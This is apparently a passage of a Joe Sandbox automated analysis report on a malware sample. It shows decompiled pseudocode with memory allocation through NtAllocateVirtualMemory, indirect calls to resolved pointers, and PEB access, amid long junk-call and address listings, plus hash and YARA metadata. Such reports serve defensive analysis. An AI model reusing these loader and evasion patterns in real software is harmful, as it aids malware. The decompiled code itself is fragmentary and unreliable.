						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						NtAllocateVirtualMemory(_v72(0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8),  &_v12, 0,  &_v20,  *0x4560d4,  *0x4560d8);
						_v44(_v12, _a4, _a8);
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						_t999 = _v40(_v24, 0, 1, 0, _v12,  &_a8, _a8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8);
						asm("sbb eax, eax");
						_t492 =  ~_t999 & _v12;
						__eflags = _t492;
						L8:
						return _t492;
					}
					L4:
					_t492 = 0;
					goto L8;
				}
				_t1002 =  *_t1009( &_v8, 0, 0, 1, 8); // executed
				if(_t1002 != 0) {
					goto L3;
				}
				_t1004 =  *_t1009( &_v8, 0, 0, 1, 0xf0000000);
				_t1102 = _t1004;
				if(_t1004 != 0) {
					goto L3;
				}
				return _t1004;
			}































                                                                              0x0040216c
                                                                              0x0040216f
                                                                              0x00402172
                                                                              0x00402177
                                                                              0x0040217a
                                                                              0x00402181
                                                                              0x0040218b
                                                                              0x00402198
                                                                              0x0040219b
                                                                              0x004021a5
                                                                              0x004021a7
                                                                              0x004021b1
                                                                              0x004021b4
                                                                              0x004021be
                                                                              0x004021c1
                                                                              0x004021cb
                                                                              0x004021ce
                                                                              0x004021da
                                                                              0x004021e2
                                                                              0x004021e6
                                                                              0x0040220f
                                                                              0x00402215
                                                                              0x0040221b
                                                                              0x00402222
                                                                              0x00402227
                                                                              0x00402228
                                                                              0x0040222f
                                                                              0x00402234
                                                                              0x00402235
                                                                              0x0040223c
                                                                              0x00402241
                                                                              0x00402242
                                                                              0x00402249
                                                                              0x0040224e
                                                                              0x0040224f
                                                                              0x00402256
                                                                              0x0040225b
                                                                              0x0040225c
                                                                              0x00402266
                                                                              0x0040226b
                                                                              0x0040226c
                                                                              0x00402273
                                                                              0x00402278
                                                                              0x00402279
                                                                              0x00402280
                                                                              0x00402285
                                                                              0x00402286
                                                                              0x0040228d
                                                                              0x00402292
                                                                              0x00402293
                                                                              0x0040229a
                                                                              0x0040229f
                                                                              0x004022a0
                                                                              0x004022a7
                                                                              0x004022af
                                                                              0x004022b0
                                                                              0x004022b7
                                                                              0x004022bc
                                                                              0x004022bd
                                                                              0x004022c4
                                                                              0x004022c9
                                                                              0x004022ca
                                                                              0x004022d1
                                                                              0x004022d6
                                                                              0x004022d7
                                                                              0x004022de
                                                                              0x004022e3
                                                                              0x004022e4
                                                                              0x004022eb
                                                                              0x004022f0
                                                                              0x004022f1
                                                                              0x004022fb
                                                                              0x00402300
                                                                              0x00402301
                                                                              0x00402308
                                                                              0x0040230d
                                                                              0x0040230e
                                                                              0x00402315
                                                                              0x0040231a
                                                                              0x0040231b
                                                                              0x00402322
                                                                              0x00402327
                                                                              0x00402328
                                                                              0x0040232f
                                                                              0x00402334
                                                                              0x00402335
                                                                              0x0040233c
                                                                              0x00402344
                                                                              0x00402345
                                                                              0x0040234c
                                                                              0x00402351
                                                                              0x00402352
                                                                              0x00402359
                                                                              0x0040235e
                                                                              0x0040235f
                                                                              0x00402366
                                                                              0x0040236b
                                                                              0x0040236c
                                                                              0x00402373
                                                                              0x00402378
                                                                              0x00402379
                                                                              0x00402380
                                                                              0x00402385
                                                                              0x00402386
                                                                              0x00402390
                                                                              0x00402395
                                                                              0x00402396
                                                                              0x0040239d
                                                                              0x004023a2
                                                                              0x004023a3
                                                                              0x004023aa
                                                                              0x004023af
                                                                              0x004023b0
                                                                              0x004023b7
                                                                              0x004023bc
                                                                              0x004023bd
                                                                              0x004023c4
                                                                              0x004023c9
                                                                              0x004023ca
                                                                              0x004023d1
                                                                              0x004023d9
                                                                              0x004023da
                                                                              0x004023e1
                                                                              0x004023e6
                                                                              0x004023e7
                                                                              0x004023ee
                                                                              0x004023f3
                                                                              0x004023f4
                                                                              0x004023fb
                                                                              0x00402400
                                                                              0x00402401
                                                                              0x00402408
                                                                              0x0040240d
                                                                              0x0040240e
                                                                              0x00402415
                                                                              0x0040241a
                                                                              0x0040241b
                                                                              0x00402425
                                                                              0x0040242a
                                                                              0x0040242b
                                                                              0x00402432
                                                                              0x00402437
                                                                              0x00402438
                                                                              0x0040243f
                                                                              0x00402444
                                                                              0x00402445
                                                                              0x0040244c
                                                                              0x00402451
                                                                              0x00402452
                                                                              0x00402459
                                                                              0x0040245e
                                                                              0x0040245f
                                                                              0x00402466
                                                                              0x0040246e
                                                                              0x0040246f
                                                                              0x00402476
                                                                              0x0040247b
                                                                              0x0040247c
                                                                              0x00402483
                                                                              0x00402488
                                                                              0x00402489
                                                                              0x00402490
                                                                              0x00402495
                                                                              0x00402496
                                                                              0x0040249d
                                                                              0x004024a2
                                                                              0x004024a3
                                                                              0x004024aa
                                                                              0x004024af
                                                                              0x004024b0
                                                                              0x004024ba
                                                                              0x004024bf
                                                                              0x004024c0
                                                                              0x004024c7
                                                                              0x004024cc
                                                                              0x004024cd
                                                                              0x004024d4
                                                                              0x004024d9
                                                                              0x004024da
                                                                              0x004024e1
                                                                              0x004024e6
                                                                              0x004024e7
                                                                              0x004024ee
                                                                              0x004024f3
                                                                              0x004024f4
                                                                              0x004024fb
                                                                              0x00402503
                                                                              0x00402504
                                                                              0x0040250b
                                                                              0x00402510
                                                                              0x00402511
                                                                              0x00402518
                                                                              0x0040251d
                                                                              0x0040251e
                                                                              0x00402525
                                                                              0x0040252a
                                                                              0x0040252b
                                                                              0x00402532
                                                                              0x00402537
                                                                              0x00402538
                                                                              0x0040253f
                                                                              0x00402544
                                                                              0x00402545
                                                                              0x0040254f
                                                                              0x00402554
                                                                              0x00402555
                                                                              0x0040255c
                                                                              0x00402561
                                                                              0x00402562
                                                                              0x00402569
                                                                              0x0040256e
                                                                              0x0040256f
                                                                              0x00402576
                                                                              0x0040257b
                                                                              0x0040257c
                                                                              0x00402583
                                                                              0x00402588
                                                                              0x00402589
                                                                              0x00402590
                                                                              0x00402598
                                                                              0x00402599
                                                                              0x004025a0
                                                                              0x004025a5
                                                                              0x004025a6
                                                                              0x004025ad
                                                                              0x004025b2
                                                                              0x004025b3
                                                                              0x004025ba
                                                                              0x004025bf
                                                                              0x004025c0
                                                                              0x004025c7
                                                                              0x004025cc
                                                                              0x004025cd
                                                                              0x004025d4
                                                                              0x004025d9
                                                                              0x004025da
                                                                              0x004025e4
                                                                              0x004025e9
                                                                              0x004025ea
                                                                              0x004025f1
                                                                              0x004025f6
                                                                              0x004025f7
                                                                              0x004025fe
                                                                              0x00402603
                                                                              0x00402604
                                                                              0x0040260b
                                                                              0x00402610
                                                                              0x00402611
                                                                              0x00402618
                                                                              0x0040261d
                                                                              0x0040261e
                                                                              0x00402625
                                                                              0x0040262d
                                                                              0x0040262e
                                                                              0x00402635
                                                                              0x0040263a
                                                                              0x0040263b
                                                                              0x00402642
                                                                              0x00402647
                                                                              0x00402648
                                                                              0x0040264f
                                                                              0x00402654
                                                                              0x00402655
                                                                              0x0040265c
                                                                              0x00402661
                                                                              0x00402662
                                                                              0x00402669
                                                                              0x0040266e
                                                                              0x0040266f
                                                                              0x00402679
                                                                              0x0040267e
                                                                              0x0040267f
                                                                              0x00402686
                                                                              0x0040268b
                                                                              0x0040268c
                                                                              0x00402693
                                                                              0x00402698
                                                                              0x00402699
                                                                              0x004026a0
                                                                              0x004026a5
                                                                              0x004026a6
                                                                              0x004026ad
                                                                              0x004026b2
                                                                              0x004026b3
                                                                              0x004026ba
                                                                              0x004026c2
                                                                              0x004026c3
                                                                              0x004026ca
                                                                              0x004026cf
                                                                              0x004026d0
                                                                              0x004026d7
                                                                              0x004026dc
                                                                              0x004026dd
                                                                              0x004026e4
                                                                              0x004026e9
                                                                              0x004026ea
                                                                              0x004026f1
                                                                              0x004026f6
                                                                              0x004026f7
                                                                              0x004026fe
                                                                              0x00402703
                                                                              0x00402704
                                                                              0x0040270e
                                                                              0x00402713
                                                                              0x00402714
                                                                              0x0040271b
                                                                              0x00402720
                                                                              0x00402721
                                                                              0x00402728
                                                                              0x0040272d
                                                                              0x0040272e
                                                                              0x00402735
                                                                              0x0040273a
                                                                              0x0040273b
                                                                              0x00402742
                                                                              0x00402747
                                                                              0x00402748
                                                                              0x0040274f
                                                                              0x00402757
                                                                              0x00402758
                                                                              0x0040275f
                                                                              0x00402764
                                                                              0x00402765
                                                                              0x0040276c
                                                                              0x00402771
                                                                              0x00402772
                                                                              0x00402779
                                                                              0x0040277e
                                                                              0x0040277f
                                                                              0x00402786
                                                                              0x0040278b
                                                                              0x0040278c
                                                                              0x00402793
                                                                              0x00402798
                                                                              0x00402799
                                                                              0x004027a3
                                                                              0x004027a8
                                                                              0x004027a9
                                                                              0x004027b0
                                                                              0x004027b5
                                                                              0x004027b6
                                                                              0x004027bd
                                                                              0x004027c2
                                                                              0x004027c3
                                                                              0x004027ca
                                                                              0x004027cf
                                                                              0x004027d0
                                                                              0x004027d7
                                                                              0x004027dc
                                                                              0x004027dd
                                                                              0x004027e4
                                                                              0x004027ef
                                                                              0x004027f0
                                                                              0x004027f1
                                                                              0x004027f2
                                                                              0x004027f7
                                                                              0x004027ff
                                                                              0x00402810
                                                                              0x0040281d
                                                                              0x0040282a
                                                                              0x00402837
                                                                              0x00402844
                                                                              0x00402854
                                                                              0x00402861
                                                                              0x0040286e
                                                                              0x0040287b
                                                                              0x00402888
                                                                              0x00402895
                                                                              0x004028a5
                                                                              0x004028b2
                                                                              0x004028bf
                                                                              0x004028cc
                                                                              0x004028d9
                                                                              0x004028e9
                                                                              0x004028f6
                                                                              0x00402903
                                                                              0x00402910
                                                                              0x0040291d
                                                                              0x0040292a
                                                                              0x0040293a
                                                                              0x00402947
                                                                              0x00402954
                                                                              0x00402961
                                                                              0x0040296e
                                                                              0x0040297e
                                                                              0x0040298b
                                                                              0x00402998
                                                                              0x004029a5
                                                                              0x004029b2
                                                                              0x004029bf
                                                                              0x004029cf
                                                                              0x004029dc
                                                                              0x004029e9
                                                                              0x004029f6
                                                                              0x00402a03
                                                                              0x00402a13
                                                                              0x00402a20
                                                                              0x00402a2d
                                                                              0x00402a3a
                                                                              0x00402a47
                                                                              0x00402a54
                                                                              0x00402a64
                                                                              0x00402a71
                                                                              0x00402a7e
                                                                              0x00402a8b
                                                                              0x00402a98
                                                                              0x00402aa8
                                                                              0x00402ab5
                                                                              0x00402ac2
                                                                              0x00402acf
                                                                              0x00402adc
                                                                              0x00402ae9
                                                                              0x00402af9
                                                                              0x00402b06
                                                                              0x00402b13
                                                                              0x00402b20
                                                                              0x00402b2d
                                                                              0x00402b3d
                                                                              0x00402b4a
                                                                              0x00402b57
                                                                              0x00402b64
                                                                              0x00402b71
                                                                              0x00402b7e
                                                                              0x00402b8e
                                                                              0x00402b9b
                                                                              0x00402ba8
                                                                              0x00402bb5
                                                                              0x00402bc2
                                                                              0x00402bd2
                                                                              0x00402bdf
                                                                              0x00402bec
                                                                              0x00402bf9
                                                                              0x00402c06
                                                                              0x00402c13
                                                                              0x00402c23
                                                                              0x00402c30
                                                                              0x00402c3d
                                                                              0x00402c4a
                                                                              0x00402c57
                                                                              0x00402c67
                                                                              0x00402c74
                                                                              0x00402c81
                                                                              0x00402c8e
                                                                              0x00402c9b
                                                                              0x00402ca8
                                                                              0x00402cb8
                                                                              0x00402cc5
                                                                              0x00402cd2
                                                                              0x00402cdf
                                                                              0x00402cec
                                                                              0x00402cfc
                                                                              0x00402d09
                                                                              0x00402d16
                                                                              0x00402d23
                                                                              0x00402d30
                                                                              0x00402d3d
                                                                              0x00402d4d
                                                                              0x00402d5a
                                                                              0x00402d67
                                                                              0x00402d74
                                                                              0x00402d81
                                                                              0x00402d91
                                                                              0x00402d9e
                                                                              0x00402dab
                                                                              0x00402db8
                                                                              0x00402dc5
                                                                              0x00402dd2
                                                                              0x00402de7
                                                                              0x00402de9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402df7
                                                                              0x00402e04
                                                                              0x00402e11
                                                                              0x00402e1e
                                                                              0x00402e2b
                                                                              0x00402e3b
                                                                              0x00402e48
                                                                              0x00402e55
                                                                              0x00402e62
                                                                              0x00402e6f
                                                                              0x00402e7c
                                                                              0x00402e8c
                                                                              0x00402e99
                                                                              0x00402ea6
                                                                              0x00402eb3
                                                                              0x00402ec0
                                                                              0x00402ed0
                                                                              0x00402edd
                                                                              0x00402eea
                                                                              0x00402ef7
                                                                              0x00402f04
                                                                              0x00402f11
                                                                              0x00402f21
                                                                              0x00402f2e
                                                                              0x00402f3b
                                                                              0x00402f48
                                                                              0x00402f55
                                                                              0x00402f65
                                                                              0x00402f72
                                                                              0x00402f7f
                                                                              0x00402f8c
                                                                              0x00402f99
                                                                              0x00402fa6
                                                                              0x00402fb6
                                                                              0x00402fc3
                                                                              0x00402fd0
                                                                              0x00402fdd
                                                                              0x00402fea
                                                                              0x00402ffa
                                                                              0x00403007
                                                                              0x00403014
                                                                              0x00403021
                                                                              0x0040302e
                                                                              0x0040303b
                                                                              0x0040304b
                                                                              0x00403058
                                                                              0x00403065
                                                                              0x00403072
                                                                              0x0040307f
                                                                              0x0040308f
                                                                              0x0040309c
                                                                              0x004030a9
                                                                              0x004030b6
                                                                              0x004030c3
                                                                              0x004030d0
                                                                              0x004030e0
                                                                              0x004030ed
                                                                              0x004030fa
                                                                              0x00403107
                                                                              0x00403114
                                                                              0x00403124
                                                                              0x00403131
                                                                              0x0040313e
                                                                              0x0040314b
                                                                              0x00403158
                                                                              0x00403165
                                                                              0x00403175
                                                                              0x00403182
                                                                              0x0040318f
                                                                              0x0040319c
                                                                              0x004031a9
                                                                              0x004031b9
                                                                              0x004031c6
                                                                              0x004031d3
                                                                              0x004031e0
                                                                              0x004031ed
                                                                              0x004031fa
                                                                              0x0040320a
                                                                              0x00403217
                                                                              0x00403224
                                                                              0x00403231
                                                                              0x0040323e
                                                                              0x0040324e
                                                                              0x0040325b
                                                                              0x00403268
                                                                              0x00403275
                                                                              0x00403282
                                                                              0x0040328f
                                                                              0x0040329f
                                                                              0x004032ac
                                                                              0x004032b9
                                                                              0x004032c6
                                                                              0x004032d3
                                                                              0x004032e3
                                                                              0x004032f0
                                                                              0x004032fd
                                                                              0x0040330a
                                                                              0x00403317
                                                                              0x00403324
                                                                              0x00403334
                                                                              0x00403341
                                                                              0x0040334e
                                                                              0x0040335b
                                                                              0x00403368
                                                                              0x00403378
                                                                              0x00403385
                                                                              0x00403392
                                                                              0x0040339f
                                                                              0x004033ac
                                                                              0x004033b9
                                                                              0x004033d6
                                                                              0x004033d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004033e6
                                                                              0x004033f3
                                                                              0x00403400
                                                                              0x0040340d
                                                                              0x0040341a
                                                                              0x0040342a
                                                                              0x00403437
                                                                              0x00403444
                                                                              0x00403451
                                                                              0x0040345e
                                                                              0x0040346b
                                                                              0x0040347b
                                                                              0x00403488
                                                                              0x00403495
                                                                              0x004034a2
                                                                              0x004034af
                                                                              0x004034bf
                                                                              0x004034cc
                                                                              0x004034d9
                                                                              0x004034e6
                                                                              0x004034f3
                                                                              0x00403500
                                                                              0x00403510
                                                                              0x0040351d
                                                                              0x0040352a
                                                                              0x00403537
                                                                              0x00403544
                                                                              0x00403554
                                                                              0x00403561
                                                                              0x0040356e
                                                                              0x0040357b
                                                                              0x00403588
                                                                              0x00403595
                                                                              0x004035a5
                                                                              0x004035b2
                                                                              0x004035bf
                                                                              0x004035cc
                                                                              0x004035d9
                                                                              0x004035e9
                                                                              0x004035f6
                                                                              0x00403603
                                                                              0x00403610
                                                                              0x0040361d
                                                                              0x0040362a
                                                                              0x0040363a
                                                                              0x00403647
                                                                              0x00403654
                                                                              0x00403661
                                                                              0x0040366e
                                                                              0x0040367e
                                                                              0x0040368b
                                                                              0x00403698
                                                                              0x004036a5
                                                                              0x004036b2
                                                                              0x004036bf
                                                                              0x004036cf
                                                                              0x004036dc
                                                                              0x004036e9
                                                                              0x004036f6
                                                                              0x00403703
                                                                              0x00403713
                                                                              0x00403720
                                                                              0x0040372d
                                                                              0x0040373a
                                                                              0x00403747
                                                                              0x00403754
                                                                              0x00403764
                                                                              0x00403771
                                                                              0x0040377e
                                                                              0x0040378b
                                                                              0x00403798
                                                                              0x004037a8
                                                                              0x004037b5
                                                                              0x004037c2
                                                                              0x004037cf
                                                                              0x004037dc
                                                                              0x004037e9
                                                                              0x004037f9
                                                                              0x00403806
                                                                              0x00403813
                                                                              0x00403820
                                                                              0x0040382d
                                                                              0x0040383d
                                                                              0x0040384a
                                                                              0x00403857
                                                                              0x00403864
                                                                              0x00403871
                                                                              0x0040387e
                                                                              0x0040388e
                                                                              0x0040389b
                                                                              0x004038a8
                                                                              0x004038b5
                                                                              0x004038c2
                                                                              0x004038d2
                                                                              0x004038df
                                                                              0x004038ec
                                                                              0x004038f9
                                                                              0x00403906
                                                                              0x00403913
                                                                              0x00403923
                                                                              0x00403930
                                                                              0x0040393d
                                                                              0x0040394a
                                                                              0x00403957
                                                                              0x00403967
                                                                              0x00403974
                                                                              0x00403981
                                                                              0x0040398e
                                                                              0x0040399b
                                                                              0x004039a8
                                                                              0x004039c9
                                                                              0x004039d5
                                                                              0x004039e0
                                                                              0x004039ed
                                                                              0x004039fa
                                                                              0x00403a07
                                                                              0x00403a17
                                                                              0x00403a24
                                                                              0x00403a31
                                                                              0x00403a3e
                                                                              0x00403a4b
                                                                              0x00403a58
                                                                              0x00403a68
                                                                              0x00403a75
                                                                              0x00403a82
                                                                              0x00403a8f
                                                                              0x00403a9c
                                                                              0x00403aac
                                                                              0x00403ab9
                                                                              0x00403ac6
                                                                              0x00403ad3
                                                                              0x00403ae0
                                                                              0x00403aed
                                                                              0x00403afd
                                                                              0x00403b0a
                                                                              0x00403b17
                                                                              0x00403b24
                                                                              0x00403b31
                                                                              0x00403b41
                                                                              0x00403b4e
                                                                              0x00403b5b
                                                                              0x00403b74
                                                                              0x00403b79
                                                                              0x00403b7b
                                                                              0x00403b7b
                                                                              0x00403b7e
                                                                              0x00000000
                                                                              0x00403b7e
                                                                              0x00402801
                                                                              0x00402801
                                                                              0x00000000
                                                                              0x00402801
                                                                              0x004021f2
                                                                              0x004021f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402205
                                                                              0x00402207
                                                                              0x00402209
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403b82

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog_strlen
                                                                              • String ID: ,D
                                                                              • API String ID: 3871006878-2732034087
                                                                              • Opcode ID: 78503eb8bda5379a5748b6bc8a39e378feb661ae0f95b78aa615e8a5f30ae69e
                                                                              • Instruction ID: a7deb7227297712cf3bdcb64e54be95acca9d37a8c266f1eedefbba9de0a961a
                                                                              • Opcode Fuzzy Hash: 78503eb8bda5379a5748b6bc8a39e378feb661ae0f95b78aa615e8a5f30ae69e
                                                                              • Instruction Fuzzy Hash: 18C296B5A01A5831ED223BB34E4FC8F1A2D8EA674C704443FF91EB91E2D97D965140BE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416EBA, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00416EBA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00416E6C); // executed
				 *0x45a5c0 = _t1;
				return 0;
			}




                                                                              0x00416ebf
                                                                              0x00416ec5
                                                                              0x00416ecc

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E6C), ref: 00416EBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 9b070c8e7664c2061faeda21353ca202bd96980014065dbc4317b0ac77534f63
                                                                              • Instruction ID: 182cd092810339332b43a940da52a17baea2225a7a2ca06b9d8a25eee5fd08e7
                                                                              • Opcode Fuzzy Hash: 9b070c8e7664c2061faeda21353ca202bd96980014065dbc4317b0ac77534f63
                                                                              • Instruction Fuzzy Hash: 91A011B8A003008B83008F30AC088003AA0B200A02B028233E802C2228FBB280A08A2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401693, Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E00401693(intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t46;
				void* _t55;
				intOrPtr _t57;
				void* _t61;
				void* _t62;
				intOrPtr _t71;
				intOrPtr _t75;
				void* _t77;
				void* _t78;

				_v12 =  *[fs:0x30];
